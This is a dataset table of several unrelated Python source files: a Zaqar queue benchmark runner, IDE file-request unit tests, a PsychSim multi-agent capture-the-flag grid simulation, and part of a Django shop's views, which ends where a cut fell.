source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
conductor.py | # Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import multiprocessing as mp
from zaqarclient.queues import client
from zaqar.bench import config
from zaqar.bench import consumer
from zaqar.bench import observer
from zaqar.bench import producer
CONF = config.conf
def _print_verbose_stats(name, stats):
print(name.capitalize())
print('=' * len(name))
values = sorted(stats.items(), key=lambda v: v[0])
formatted_vals = ['{}: {:.1f}'.format(*v) for v in values]
print('\n'.join(formatted_vals))
print() # Blank line
def _reset_queues():
cli = client.Client(CONF.server_url)
for i in range(CONF.num_queues):
# TODO(kgriffs): DRY up name generation so it is done
# in a helper, vs. being copy-pasted everywhere.
queue = cli.queue(CONF.queue_prefix + '-' + str(i))
queue.delete()
def main():
CONF(project='zaqar', prog='zaqar-benchmark')
# NOTE(kgriffs): Reset queues since last time. We don't
# clean them up after the performance test, in case
# the user wants to examine the state of the system.
if not CONF.skip_queue_reset:
if CONF.verbose:
print('Resetting queues...')
_reset_queues()
downstream_queue = mp.Queue()
procs = [mp.Process(target=worker.run, args=(downstream_queue,))
for worker in [producer, consumer, observer]]
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
stats = {}
for each_proc in procs:
stats.update(downstream_queue.get_nowait())
if CONF.verbose:
print()
for name in ('producer', 'observer', 'consumer'):
stats_group = stats[name]
# Skip disabled workers
if not stats_group['duration_sec']:
continue
_print_verbose_stats(name, stats_group)
else:
stats['params'] = {
'producer': {
'processes': CONF.producer_processes,
'workers': CONF.producer_workers
},
'consumer': {
'processes': CONF.consumer_processes,
'workers': CONF.consumer_workers
},
'observer': {
'processes': CONF.observer_processes,
'workers': CONF.observer_workers
},
}
print(json.dumps(stats))
|
files.py | """
Tests file interactions.
"""
# External
import unittest
import threading
# Local
import util
import config
class FilesTests(unittest.TestCase):
_team = None
_projName = None
@classmethod
def setUpClass(cls):
# Log In
data = dict(username = config.username, password = config.password)
util.makeIDERequest(util.loginEndPoint, data)
token = util.getCurrentToken()
util.assertIsNotNone(token, "No token stored from server response")
# Get a team
resp = util.makeIDERequest('user/info')
teams = resp['teams']
util.assertGreaterThan(0, len(teams), "User must be in a team to test the IDE")
cls._team = teams[0]['id']
def setUp(self):
# Create a project
self._projName = 'FilesTests-' + util.idGenerator()
data = dict(team = self._team, project = self._projName)
util.makeIDERequest('proj/new', data)
def tearDown(self):
data = dict(team = self._team, project = self._projName)
util.makeIDERequest('proj/del', data)
def test_1058(self):
data = dict(team = self._team, project = self._projName, path = 'robot.py')
data['paths'] = [data['path']]
data['message'] = 'A dummy commit'
data['data'] = 'Some dummy content for a dummy commit'
# Generate some data so that the requests have something to do
util.makeIDERequest('file/put', data)
util.makeIDERequest('proj/commit', data)
def fileTreeRequest():
global fileTreeResult
data2 = dict(data)
data2['path'] = '.'
fileTreeResult = util.makeIDERequest('file/compat-tree', data2)
def lintRequest():
global lintResult
lintResult = util.makeIDERequest('file/lint', data)
# util.printDict(lintResult)
def logRequest():
global logResult
logResult = util.makeIDERequest('file/log', data)
# util.printDict(logResult)
threads = []
for req in [ fileTreeRequest, lintRequest, logRequest ]:
t = threading.Thread( target = req )
t.start()
threads.append(t)
for t in threads:
t.join()
util.raiseOnRequestError(fileTreeResult)
util.raiseOnRequestError(lintResult)
util.raiseOnRequestError(logResult)
if __name__ == '__main__':
unittest.main(buffer=True)
|
teamwork.py | # Team of agents that attempts to capture a flag without being caught by enemies
# Agents:
# Explorer - minimize distance between self and goal location
# Distractor - maximize distance between explorer and enemy (new)
# Enemy - minimize distance between self and explorer and distractor
# Base - deploy distractor when explorer in danger (new)
from __future__ import print_function
from psychsim.reward import *
from psychsim.pwl import *
from psychsim.action import *
from psychsim.world import *
from psychsim.agent import *
import pyglet
from pyglet.window import key
from threading import Thread
from time import time
import os
class Scenario:
def __init__(self,
MAP_SIZE_X=0,
MAP_SIZE_Y=0,
F_ACTORS=0,
F_START_LOC=[],
F_GOAL_LOC=[],
E_ACTORS=0,
E_START_LOC=[],
E_PATROL_RANGE=5,
D_ACTORS=0,
D_START_LOC=[],
BASE=[0.0, 0.0],
DISTRACTOR=[0.0, 0.0],
ENEMY=[0.0, 0.0, 0.0],
AGENT=[0.0, 0.0]):
self.MAP_SIZE_X = MAP_SIZE_X
self.MAP_SIZE_Y = MAP_SIZE_Y
self.F_ACTORS = F_ACTORS
self.F_START_LOC = F_START_LOC
self.F_GOAL_LOC = F_GOAL_LOC
self.E_ACTORS = E_ACTORS
self.E_START_LOC = E_START_LOC
self.E_PATROL_RANGE = E_PATROL_RANGE
self.D_ACTORS = D_ACTORS
self.D_START_LOC = D_START_LOC
self.BASE = BASE
self.DISTRACTOR = DISTRACTOR
self.ENEMY = ENEMY
self.AGENT = AGENT
self.world = World()
self.world.defineState(None, 'turns', int)
self.world.setState(None, 'turns', 0)
self.world.addTermination(makeTree({'if': thresholdRow(stateKey(None, 'turns'), 20),
True: True, False: False}))
self.create_friendly_agents()
self.create_enemy_agents()
self.create_distract_agents()
self.create_base()
self.paused = False
# Parallel action
# self.world.setOrder([set(self.world.agents.keys())])
# Sequential action
self.world.setOrder(self.world.agents.keys())
def f_get_current_x(self, actor):
return self.world.getState(actor.name, 'x').domain()[0]
def f_get_current_y(self, actor):
return self.world.getState(actor.name, 'y').domain()[0]
def f_get_start_x(self, index):
return int((self.F_START_LOC[index]).split(",", 1)[0])
def f_get_start_y(self, index):
return int((self.F_START_LOC[index]).split(",", 1)[1])
def f_get_goal_x(self, index):
return int((self.F_GOAL_LOC[index]).split(",", 1)[0])
def f_get_goal_y(self, index):
return int((self.F_GOAL_LOC[index]).split(",", 1)[1])
def e_get_current_x(self, actor):
return self.world.getState(actor.name, 'x').domain()[0]
def e_get_current_y(self, actor):
return self.world.getState(actor.name, 'y').domain()[0]
def e_get_start_x(self, index):
return int((self.E_START_LOC[index]).split(",", 1)[0])
def e_get_start_y(self, index):
return int((self.E_START_LOC[index]).split(",", 1)[1])
def d_get_start_x(self, index):
return int((self.D_START_LOC[index]).split(",", 1)[0])
def d_get_start_y(self, index):
return int((self.D_START_LOC[index]).split(",", 1)[1])
def find_distance(self, start_x, start_y, goal_x, goal_y):
return abs(goal_x - start_x) + abs(goal_y - start_y)
def create_base(self):
for index in range(0, self.D_ACTORS):
base = Agent('Base' + str(index))
self.world.addAgent(base)
base.setHorizon(5)
self.world.defineState(base.name, 'x', int)
self.world.setState(base.name, 'x', 0)
self.world.defineState(base.name, 'y', int)
self.world.setState(base.name, 'y', 0)
# Deploy distractor
action = base.addAction({'verb': 'Deploy'})
tree = makeTree(setToConstantMatrix(stateKey('Distractor' + str(index), 'deployed'), True))
self.world.setDynamics(stateKey('Distractor' + str(index), 'deployed'), action, tree)
# Nop
action = base.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
base.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.BASE[0])
base.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.BASE[0])
base.setReward(minimizeFeature(stateKey('Distractor' + str(index), 'cost')), self.BASE[1])
def create_friendly_agents(self):
for index in range(0, self.F_ACTORS):
actor = Agent('Actor' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', self.f_get_start_x(index))
self.world.defineState(actor.name, 'goal_x', int)
self.world.setState(actor.name, 'goal_x', self.f_get_goal_x(index))
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', self.f_get_start_y(index))
self.world.defineState(actor.name, 'goal_y', int)
self.world.setState(actor.name, 'goal_y', self.f_get_goal_y(index))
# Positive reward for going towards goal
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(actor.name, 'goal_x')),
self.AGENT[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(actor.name, 'goal_y')),
self.AGENT[0])
# Negative reward for going towards enemy
enemy = 'Enemy' + str(index)
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(enemy, 'x')), self.AGENT[1])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(enemy, 'y')), self.AGENT[1])
self.set_friendly_actions(actor)
# Terminate if agent reaches goal
tree = makeTree({'if': equalFeatureRow(stateKey(actor.name, 'x'), stateKey(actor.name, 'goal_x')),
True: {'if': equalFeatureRow(stateKey(actor.name, 'y'), stateKey(actor.name, 'goal_y')),
True: True,
False: False},
False: False})
self.world.addTermination(tree)
def set_friendly_actions(self, actor):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Downmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), self.MAP_SIZE_Y - 1),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Upmost boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
def create_distract_agents(self):
for index in range(0, self.D_ACTORS):
actor = Agent('Distractor' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Agent is not allowed to move if not deployed by the base
self.world.defineState(actor.name, 'deployed', bool)
self.world.setState(actor.name, 'deployed', False)
# Every time the agent makes an action, there is a cost associated
self.world.defineState(actor.name, 'cost', int)
self.world.setState(actor.name, 'cost', 0)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', 0)
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', 0)
# Positive reward for luring enemy away from Agents
actor.setReward(
minimizeDifference(stateKey('Actor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.DISTRACTOR[0])
actor.setReward(
minimizeDifference(stateKey('Actor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.DISTRACTOR[0])
# Positive reward for moving closer to enemy
actor.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'x'), stateKey('Enemy' + str(index), 'x')),
self.DISTRACTOR[1])
actor.setReward(
minimizeDifference(stateKey('Distractor' + str(index), 'y'), stateKey('Enemy' + str(index), 'y')),
self.DISTRACTOR[1])
self.set_distract_actions(actor)
def set_distract_actions(self, actor):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Reward for not moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'x'), 0),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Downmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'y'), str(self.MAP_SIZE_Y)),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
# Cost for moving
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'cost'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'cost'), action, tree)
# Upmost boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'deployed'), True),
True: {'if': equalRow(stateKey(actor.name, 'Y'), 0),
True: False, False: True}, False: False})
actor.setLegal(action, tree)
def create_enemy_agents(self):
for index in range(0, self.E_ACTORS):
actor = Agent('Enemy' + str(index))
self.world.addAgent(actor)
actor.setHorizon(5)
# Set agent's starting location
self.world.defineState(actor.name, 'x', int)
self.world.setState(actor.name, 'x', self.e_get_start_x(index))
self.world.defineState(actor.name, 'y', int)
self.world.setState(actor.name, 'y', self.e_get_start_y(index))
enemy = 'Actor' + str(index)
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey(enemy, 'x')), self.ENEMY[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey(enemy, 'y')), self.ENEMY[0])
actor.setReward(minimizeDifference(stateKey(actor.name, 'x'), stateKey('Distractor' + str(index), 'x')),
self.ENEMY[1])
actor.setReward(minimizeDifference(stateKey(actor.name, 'y'), stateKey('Distractor' + str(index), 'y')),
self.ENEMY[1])
# actor.setReward(minimizeDifference(stateKey(enemy, 'x'), stateKey(enemy, 'goal_x')), self.ENEMY[2])
# actor.setReward(minimizeDifference(stateKey(enemy, 'y'), stateKey(enemy, 'goal_y')), self.ENEMY[2])
self.set_enemy_actions(actor, index)
# Terminate if enemy captures agent
tree = {'if': equalFeatureRow(stateKey(actor.name, 'x'), stateKey('Actor' + str(index), 'x')),
True: {'if': equalFeatureRow(stateKey(actor.name, 'y'), stateKey('Actor' + str(index), 'y')),
True: True, False: False},
False: False}
self.world.addTermination(makeTree(tree))
def set_enemy_actions(self, actor, index):
# Nop
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), str(self.MAP_SIZE_X)),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Downmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), self.MAP_SIZE_Y - 1),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Upmost boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
def evaluate_score(self):
cwd = os.getcwd()
print(cwd)
t = str(time())
file = open(cwd + "\output\\" + t + ".txt", "w")
file.write("Parameters:\n")
file.write("Map Size X: " + str(self.MAP_SIZE_X) + "\n")
file.write("Map Size Y: " + str(self.MAP_SIZE_Y) + "\n")
file.write("Soldiers: " + str(self.F_ACTORS) + "\n")
file.write("Soldier Start Locations: " + str(self.F_START_LOC) + "\n")
file.write("Soldier Goal Locations: " + str(self.F_GOAL_LOC) + "\n")
file.write("Enemies: " + str(self.E_ACTORS) + "\n")
file.write("Enemy Start Locations: " + str(self.E_START_LOC) + "\n")
file.write("Bases/Helicopters: " + str(self.D_ACTORS) + "\n")
file.write("Base/Helicopter Start Locations: " + str(self.D_START_LOC) + "\n")
file.write("\n \n")
file.write("Weights:\n")
file.write("Soldier:\n")
file.write("Minimizing soldier and goal distance: " + str(self.AGENT[0]) + "\n")
file.write("Minimizing soldier and enemy distance: " + str(self.AGENT[1]) + "\n")
file.write("Enemy:\n")
file.write("Minimizing soldier and enemy distance: " + str(self.ENEMY[0]) + "\n")
file.write("Minimizing soldier and helicopter distance: " + str(self.ENEMY[1]) + "\n")
file.write("Minimizing soldier and goal distance: " + str(self.ENEMY[2]) + "\n")
file.write("Base:\n")
file.write("Minimizing helicopter and enemy distance: " + str(self.BASE[0]) + "\n")
file.write("Minimizing helicopter cost: " + str(self.BASE[1]) + "\n")
file.write("Helicopter:\n")
file.write("Minimizing helicopter and enemy distance: " + str(self.DISTRACTOR[0]) + "\n")
file.write("Minimizing soldier and enemy distance : " + str(self.DISTRACTOR[1]) + "\n")
file.write("\n \n")
file.write("Scores:\n")
file.write("Soldier-Goal Manhattan Distance: \n")
agent_goal_scores = []
for index in range(0, self.F_ACTORS):
ending_x = int(self.world.getState('Actor' + str(index), 'x').domain()[0])
ending_y = int(self.world.getState('Actor' + str(index), 'y').domain()[0])
agent_goal_scores.append(abs(self.f_get_goal_x(index) - ending_x) + abs(
self.f_get_goal_y(index) - ending_y))
file.write("Soldier" + str(index) + ": " + str(agent_goal_scores[index]) + "\n")
# print(agent_goal_scores[index])
file.write("Soldier-Enemy Manhattan Distance: \n")
agent_enemy_scores = []
for index in range(0, self.F_ACTORS):
soldier_x = int(self.world.getState('Actor' + str(index), 'x').domain()[0])
soldier_y = int(self.world.getState('Actor' + str(index), 'y').domain()[0])
enemy_x = int(self.world.getState('Enemy' + str(index), 'x').domain()[0])
enemy_y = int(self.world.getState('Enemy' + str(index), 'y').domain()[0])
agent_enemy_scores.append(abs(soldier_x - enemy_x) + abs(
soldier_y - enemy_y))
file.write("Soldier" + str(index) + ": " + str(agent_enemy_scores[index]) + "\n")
if(agent_enemy_scores[index] == 0):
file.write("Soldier was captured, penalty awarded")
# print(agent_enemy_scores[index])
file.write("Helicopter Deployment Costs: \n")
helicopter_cost_scores =[]
for index in range(0, self.D_ACTORS):
helicopter_score = int(self.world.getState('Distractor'+str(index), 'cost').domain()[0])
helicopter_cost_scores.append(helicopter_score)
file.write("Distractor"+str(index)+": "+ str(helicopter_cost_scores[index])+"\n")
file.write("Turns Taken: \n")
turns = int(self.world.getState(None,'turns').domain()[0])
file.write(str(turns) + "\n")
if(turns < 10):
file.write("Bonus for taking less than 10 turns")
def run_without_visual(self):
while not self.world.terminated():
result = self.world.step()
self.world.explain(result, 2)
self.evaluate_score()
def run_with_visual(self):
pyglet.resource.path = ['./resources']
pyglet.resource.reindex()
SCREEN_WIDTH = self.MAP_SIZE_X * 32
SCREEN_HEIGHT = self.MAP_SIZE_Y * 32
window = pyglet.window.Window(resizable=True)
window.set_size(SCREEN_WIDTH, SCREEN_HEIGHT)
tile_image = pyglet.resource.image("grass.png")
tiles_batch = pyglet.graphics.Batch()
tiles = []
for y in range(0, self.MAP_SIZE_Y):
for x in range(0, self.MAP_SIZE_X):
tiles.append(pyglet.sprite.Sprite(
img=tile_image,
x=x * 32,
y=y * 32,
batch=tiles_batch)
)
goal_image = pyglet.resource.image("target.png")
goals_batch = pyglet.graphics.Batch()
goals = []
for index in range(0, len(self.F_GOAL_LOC)):
goals.append(pyglet.sprite.Sprite(
img=goal_image,
x=self.f_get_goal_x(index) * 32,
y=self.f_get_goal_y(index) * 32,
batch=goals_batch)
)
agent_image = pyglet.resource.image("soldier_blue.png")
agents_batch = pyglet.graphics.Batch()
agents = []
for index in range(0, self.F_ACTORS):
agents.append(pyglet.sprite.Sprite(
img=agent_image,
x=self.f_get_start_x(index) * 32,
y=self.f_get_start_y(index) * 32,
batch=agents_batch)
)
enemy_image = pyglet.resource.image("soldier_red.png")
enemies_batch = pyglet.graphics.Batch()
enemies = []
for index in range(0, self.E_ACTORS):
enemies.append(pyglet.sprite.Sprite(
img=enemy_image,
x=self.e_get_start_x(index) * 32,
y=self.e_get_start_y(index) * 32,
batch=enemies_batch)
)
distractor_image = pyglet.resource.image("heli.png")
base_image = pyglet.resource.image("base.png")
allies_batch = pyglet.graphics.Batch()
bases = []
distractors = []
for index in range(0, self.D_ACTORS):
bases.append(pyglet.sprite.Sprite(
img=base_image,
x=self.d_get_start_x(index) * 32,
y=self.d_get_start_y(index) * 32,
batch=allies_batch)
)
distractors.append(pyglet.sprite.Sprite(
img=distractor_image,
x=self.d_get_start_x(index) * 32,
y=self.d_get_start_y(index) * 32,
batch=allies_batch)
)
@window.event
def on_draw():
window.clear()
tiles_batch.draw()
goals_batch.draw()
agents_batch.draw()
enemies_batch.draw()
allies_batch.draw()
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.P:
self.paused = True
print('Paused')
if symbol == key.U:
self.paused = False
print('Resumed')
def update(dt):
if not self.paused:
result = self.world.step()
self.world.explain(result, 2)
if self.world.terminated():
self.evaluate_score()
window.close()
for index in range(0, self.F_ACTORS):
agents[index].x = int(self.world.getState('Actor' + str(index), 'x').domain()[0]) * 32
agents[index].y = int(self.world.getState('Actor' + str(index), 'y').domain()[0]) * 32
for index in range(0, self.E_ACTORS):
enemies[index].x = int(self.world.getState('Enemy' + str(index), 'x').domain()[0]) * 32
enemies[index].y = int(self.world.getState('Enemy' + str(index), 'y').domain()[0]) * 32
for index in range(0, self.D_ACTORS):
distractors[index].x = int(self.world.getState('Distractor' + str(index), 'x').domain()[0]) * 32
distractors[index].y = int(self.world.getState('Distractor' + str(index), 'y').domain()[0]) * 32
pyglet.clock.schedule_interval(update, 0.1)
# pyglet.app.run()
Thread(target=pyglet.app.run()).start()
# target=pyglet.app.run()
# if __name__ == '__main__':
#
# print('RUN COMPLETE!')
|
views.py | from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.http import HttpResponse, HttpResponseRedirect, QueryDict
from django.core.serializers.json import DjangoJSONEncoder
from django.contrib.auth import authenticate, login, logout
from django.views.generic import View, TemplateView
from django.contrib.sessions.models import Session
from django.contrib.auth.models import User
from django.template.loader import render_to_string
from django.core.mail import send_mail
from maracay.backEnd import backStart, profileBackend, filterProducts, adminSite
from django.shortcuts import render
from django.core.cache import cache
from django.conf import settings
from threading import Thread
from maracay.models import Tools, Profile as ProfileDB, PurchaseConfirmation, TokenPassword
from maracay import get_client_ip, config
import json,random, string, datetime
from django.contrib import admin
# Create your views here.
#Main Class
class Maracay(TemplateView):
template_name = 'market/index.html'
#index
def get(self, request, *args, **kwargs):
_allproducts = backStart(request)
_allproducts.get()
if 'pagination' not in request.GET:
data = _allproducts.response_data
data['code'] = _allproducts.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
direction = '/static/images/upload/imagesp/'
return render(request, 'market/index.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
'''else:
print ("22222")
data = _allproducts.response_data
data['code'] = _allproducts.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 25 contacts per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
return HttpResponse(json.dumps(dataAll, cls=DjangoJSONEncoder), content_type='application/json')'''
class Account(View):
def get(self, request, *args, **kwargs):
if str(request.user) != 'AnonymousUser':#si esta logeado su data
_accountData = profileBackend(request)
_accountData.accountData()
data = _accountData.response_data
return render(request, 'market/account.html', {'data':data['data']})
else: # registro
return render(request, 'market/register.html', {})
class Login(View):
def __init__(self):
self.requireds = ['email', 'password', 'csrfmiddlewaretoken']
def post(self, request, *args, **kwargs):
# __ip = get_client_ip(request)
for key in self.requireds:
if not key in request.POST.keys():
return HttpResponse(status=400, content_type='application/json')
for session in Session.objects.filter(session_key=request.session.session_key):
if session:
#No se puede iniciar Sesion usuario ya tiene una sesion activa
return HttpResponse(json.dumps({'code':400,'message':'Ya tiene una sesiòn activa'}, cls=DjangoJSONEncoder), content_type='application/json')
# if cache.get('cache_ip__%s'%__ip):
# return HttpResponse(json.dumps({'code':400,'message':'Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
user = authenticate(username=request.POST['email'], password=request.POST['password'])
if user:
cache.clear()
login(request, user)
return HttpResponse(json.dumps({'code':200}, cls=DjangoJSONEncoder), content_type='application/json')
else:
return HttpResponse(json.dumps({'code':400,'message':'Intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
#
# __cache_count_error = cache.get('cache_error__%s'%__ip)
# __cache_exist = cache.get('cache_ip__%s'%__ip)
# if __cache_exist:
# return HttpResponse(json.dumps({'code':400,'message':'Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
# else:
# if __cache_count_error:
# if __cache_count_error == 1:
# cache.set('cache_error__%s'%__ip,1+1,60)
# return HttpResponse(json.dumps({'code':400,'message':'Segundo intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
# elif __cache_count_error == 2:
# cache.set('cache_ip__%s'%__ip,__ip,300)
# return HttpResponse(json.dumps({'code':400,'message':'Tercer intento fallido/Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
# else:
# cache.set('cache_error__%s'%__ip,1,60)
# return HttpResponse(json.dumps({'code':400,'message':'Primer intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
class Logout(View):
def get(self, request, *args, **kwargs):
logout(request)
_allproducts = backStart(request)
_allproducts.get('all')
data = _allproducts.response_data
data['code'] = _allproducts.code
